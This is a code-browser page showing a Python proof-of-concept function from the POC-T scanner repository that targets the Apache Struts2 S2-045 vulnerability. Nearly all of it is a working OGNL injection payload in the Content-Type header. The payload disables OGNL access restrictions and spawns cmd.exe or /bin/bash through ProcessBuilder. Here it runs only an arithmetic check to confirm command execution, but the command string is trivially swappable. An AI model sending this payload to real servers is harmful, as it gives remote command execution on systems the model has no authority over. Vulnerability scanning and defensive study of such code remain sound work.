MCPcopy
hub / github.com/Xyntax/POC-T / poc

Function poc

script/struts2-s2045.py:22–41  ·  view source on GitHub ↗
(url)

Source from the content-addressed store, hash-verified

20
21
22def poc(url):
23 if '://' not in url:
24 url = 'http://' + url
25 try:
26 a = random.randint(10000000, 20000000)
27 b = random.randint(10000000, 20000000)
28 c = a + b
29 win = 'set /a ' + str(a) + ' + ' + str(b)
30 linux = 'expr ' + str(a) + ' + ' + str(b)
31
32 header = dict()
33 header["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
34 header["Content-Type"] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#iswin?(#cmd='" + win + "'):(#cmd='" + linux + "')).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
35 r = requests.get(url, headers=header, timeout=5)
36 if str(c) in r.text:
37 return '[S2-045]'+url
38 else:
39 return False
40 except Exception:
41 return False

Callers

nothing calls this directly

Calls 1

getMethod · 0.80

Tested by

no test coverage detected